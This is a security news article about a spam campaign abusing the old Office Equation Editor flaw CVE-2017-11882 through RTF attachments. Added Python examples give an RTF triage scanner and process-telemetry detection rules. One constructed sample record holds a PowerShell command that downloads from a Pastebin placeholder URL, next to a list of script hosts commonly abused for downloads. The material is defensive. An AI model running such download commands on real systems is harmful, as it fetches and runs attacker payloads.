
How the New Spam Campaign is Targeting Microsoft Office with Old Malware


Recently, Microsoft warned that a fresh spam campaign is exploiting an old Office vulnerability in Europe. Read on to know more…

Recently, Microsoft issued a security warning regarding a spam campaign that seems to abuse a security vulnerability in its Office productivity suite. The campaign sends malicious RTF documents that infect users as soon as they open the attachment. As of now, the spam campaign is targeting European users. Microsoft's Security Intelligence account made the announcement in a series of tweets recently.

Security Vulnerabilities
According to Microsoft's security researchers, the ongoing spam campaign includes RTF documents that exploit CVE-2017-11882, a vulnerability in Microsoft Office and WordPad.

CVE-2017-11882 is the identifier of a vulnerability in an older version of the Equation Editor component included with Office. Security researchers from Embedi discovered the bug in this component back in 2017; it allowed attackers to execute code on a user's device once the user opened a weaponized Office file containing a crafted exploit.

The CVE-2017-11882 vulnerability lets RTF and Word documents execute commands as soon as they are opened. The vulnerability was patched back in 2017, but Microsoft says it still sees the exploit used in spam campaigns, which have increased in the last several weeks. Microsoft recommends that users apply the security updates.

“An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction,” Microsoft Security Intelligence tweeted.

According to a report from Recorded Future and another from Kaspersky Lab, CVE-2017-11882 was one of the most exploited vulnerabilities of 2018, as attackers continued to prey on users who had yet to update their software.
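The Equation Editor object that carries this exploit is embedded in the RTF as an OLE object, and that leaves identifiable markers in the file: the declared `\objclass`, the ProgID `Equation.3` in the OLE 1.0 header of the hex-encoded `\objdata` blob, the component's CLSID, and the `Equation Native` stream name inside it. The Python triage script below is an added example, not part of the article and not Microsoft tooling; it checks an RTF byte string for those markers. The two sample documents are constructed inline, and the "malicious" one carries only the identifying markers of an Equation Editor object, not an exploit. A hit means the document embeds the legacy Equation Editor object, which on an unpatched system is exactly the condition CVE-2017-11882 needs; treat it as a triage signal rather than proof of malice, since older legitimate documents with equations carry the same object.

```python
import re
from binascii import unhexlify

# CLSID of the legacy Equation Editor 3.0 OLE server (ProgID "Equation.3"),
# the component patched for CVE-2017-11882. Inside the embedded object's
# compound-file directory it is stored in Windows' on-disk GUID byte order,
# so the comparison is done against that raw form, not the dotted string.
EQNEDT_CLSID = "0002CE02-0000-0000-C000-000000000046"


def clsid_to_bytes(clsid: str) -> bytes:
    """Serialise a dotted GUID the way Windows stores it (mixed-endian)."""
    d1, d2, d3, d4, d5 = clsid.split("-")
    return (int(d1, 16).to_bytes(4, "little")
            + int(d2, 16).to_bytes(2, "little")
            + int(d3, 16).to_bytes(2, "little")
            + unhexlify(d4) + unhexlify(d5))


EQNEDT_CLSID_BYTES = clsid_to_bytes(EQNEDT_CLSID)
EQUATION_NATIVE_STREAM = "Equation Native".encode("utf-16-le")  # stream names are UTF-16LE

OBJECT_RE = re.compile(rb"\\object\b")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9.]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def scan_rtf(data: bytes) -> dict:
    """Static triage of one RTF file: which Equation Editor markers are present."""
    report = {"is_rtf": False, "objects": 0, "equation_objclass": False,
              "equation_progid": False, "equation_clsid": False,
              "equation_native_stream": False, "suspicious": False}
    # Word accepts a truncated header ({\rt), so do not insist on the full {\rtf1.
    if not data.lstrip().startswith(b"{\\rt"):
        return report
    report["is_rtf"] = True
    report["objects"] = len(OBJECT_RE.findall(data))
    # Marker 1: the object class declared in the RTF itself.
    for m in OBJCLASS_RE.finditer(data):
        if m.group(1).lower().startswith(b"equation"):
            report["equation_objclass"] = True
    # Markers 2-4: decode each hex-encoded \objdata blob and look inside it.
    for m in OBJDATA_RE.finditer(data):
        hexblob = re.sub(rb"\s+", b"", m.group(1))
        if len(hexblob) % 2:
            hexblob = hexblob[:-1]
        try:
            blob = unhexlify(hexblob)
        except ValueError:
            continue
        if b"equation." in blob.lower():        # ProgID in the OLE 1.0 header
            report["equation_progid"] = True
        if EQNEDT_CLSID_BYTES in blob:           # CLSID in the compound file
            report["equation_clsid"] = True
        if EQUATION_NATIVE_STREAM in blob:       # stream holding the equation data
            report["equation_native_stream"] = True
    report["suspicious"] = any(report[k] for k in (
        "equation_objclass", "equation_progid", "equation_clsid", "equation_native_stream"))
    return report


def build_sample_rtf(progid: bytes, inner: bytes) -> bytes:
    """Construct a minimal RTF with one embedded OLE object (test data only)."""
    name = progid + b"\x00"
    ole1_header = (b"\x01\x05\x00\x00"                        # OLE 1.0 version
                   + b"\x02\x00\x00\x00"                      # format: embedded object
                   + len(name).to_bytes(4, "little") + name   # class name (ProgID)
                   + b"\x00\x00\x00\x00" * 2)                 # empty topic/item names
    objdata = (ole1_header + inner).hex().encode()
    return (b"{\\rtf1\\ansi{\\object\\objemb\\objw1000\\objh1000"
            + b"{\\*\\objclass " + progid + b"}"
            + b"{\\*\\objdata " + objdata + b"}}\\par}")


# Constructed samples: the "malicious" one only carries the identifying
# markers of an Equation Editor object, it contains no exploit.
MALICIOUS_SAMPLE = build_sample_rtf(b"Equation.3", EQNEDT_CLSID_BYTES + EQUATION_NATIVE_STREAM)
BENIGN_SAMPLE = build_sample_rtf(b"Word.Document.8", b"\x00" * 32)

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_rtf(doc))
```

To triage a real attachment, pass its raw bytes: `scan_rtf(open(path, "rb").read())`. The script deliberately reads the hex blob rather than trusting `\objclass` alone, because the class control word is optional and easy to omit while the object data itself still names the component.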

Modus Operandi
This vulnerability allows attackers to execute code on a user's device without any further user interaction: users can be infected simply by opening the attached document.

Microsoft said that when a user opens a malicious attachment, the file tries to execute a number of scripts written in VBScript, PowerShell, PHP and other languages to download the payload. These scripts are generally fetched from a Pastebin repository.

According to Microsoft, the payload downloaded onto an infected system is an executable backdoor trojan programmed to connect to a malicious domain.
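The chain Microsoft describes (document opened, Equation Editor exploited, script interpreters launched to fetch a payload from Pastebin) is visible in process-creation telemetry. The legacy Equation Editor server, eqnedt32.exe, has no legitimate reason to start child processes, so any child of it is a strong signal; Office applications spawning script hosts, and command lines that reference pastebin.com, add further context. The Python below is an added example, not from the article or from Microsoft, that runs those three rules over constructed process-creation records in a simplified key=value format; the field names mirror Sysmon's process-creation event, but the records themselves are made up for the example.

```python
import re
from dataclasses import dataclass
from typing import List

# Process names are compared as lower-cased basenames because install paths vary.
EQUATION_EDITOR = "eqnedt32.exe"              # legacy Equation Editor 3.0 server
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                "certutil.exe", "bitsadmin.exe"}
PASTE_SITE_RE = re.compile(r"\bpastebin\.com\b", re.IGNORECASE)


@dataclass
class ProcessCreate:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessCreate:
    """Parse one constructed 'key=value|...|CommandLine=...' record.

    CommandLine is always the last field in this constructed format, so it is
    split off first and may itself contain '|' or '=' characters.
    """
    head, _, cmdline = line.strip().partition("|CommandLine=")
    fields = dict(part.split("=", 1) for part in head.split("|") if "=" in part)
    return ProcessCreate(fields.get("Image", ""), fields.get("ParentImage", ""), cmdline)


def classify(ev: ProcessCreate) -> List[str]:
    """Return the detection reasons that fire for one event (empty list = nothing)."""
    child, parent = basename(ev.image), basename(ev.parent_image)
    reasons = []
    if parent == EQUATION_EDITOR:
        # Equation Editor renders equations; it never needs to launch anything.
        reasons.append("equation-editor-spawned-child")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    if PASTE_SITE_RE.search(ev.command_line):
        reasons.append("cmdline-references-pastebin")
    return reasons


def detect(lines: List[str]) -> List[dict]:
    """Run the rules over a batch of records and return only the events that fired."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            alerts.append({"image": basename(ev.image),
                           "parent": basename(ev.parent_image),
                           "reasons": reasons})
    return alerts


# Constructed sample records. Only record 2 models the campaign's behaviour;
# record 1 shows the normal COM launch of Equation Editor, which must not alert.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\svchost.exe|ParentImage=C:\\Windows\\System32\\services.exe"
    "|CommandLine=svchost.exe -k DcomLaunch",
    "EventID=1|Image=C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
    "|ParentImage=C:\\Windows\\System32\\svchost.exe|CommandLine=\"EQNEDT32.EXE\" -Embedding",
    "EventID=1|Image=C:\\Windows\\System32\\cmd.exe"
    "|ParentImage=C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
    "|CommandLine=cmd.exe /c powershell.exe -Command \"iwr https://pastebin.com/raw/PLACEHOLDER\"",
    "EventID=1|Image=C:\\Windows\\splwow64.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=C:\\Windows\\splwow64.exe 12288",
    "EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell.exe -NoProfile",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"ALERT {a['parent']} -> {a['image']}: {', '.join(a['reasons'])}")
```

The first rule is the one worth deploying on its own: it needs no knowledge of the payload, the paste site or the script language, and it keeps working when the campaign swaps any of them, which is why it catches unpatched hosts regardless of the lure. The other two rules are noisier and serve as corroboration.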

Damage Control
The malicious domain has been taken down, but Microsoft says there is always a risk that future campaigns will use similar tactics to exploit the vulnerability. Microsoft is now asking all Windows users to install the security update for this vulnerability as soon as possible.

If you have already applied the November 2017 patch, you are protected from this vulnerability. This exploit has been used several times to target users who may have forgotten to install the software update.

The latest news is that the backdoor trojan's C&C server has been taken down since Microsoft issued its security alert. However, to avoid future exploitation, it is wise to patch the vulnerability by applying the November 2017 Patch Tuesday security updates.

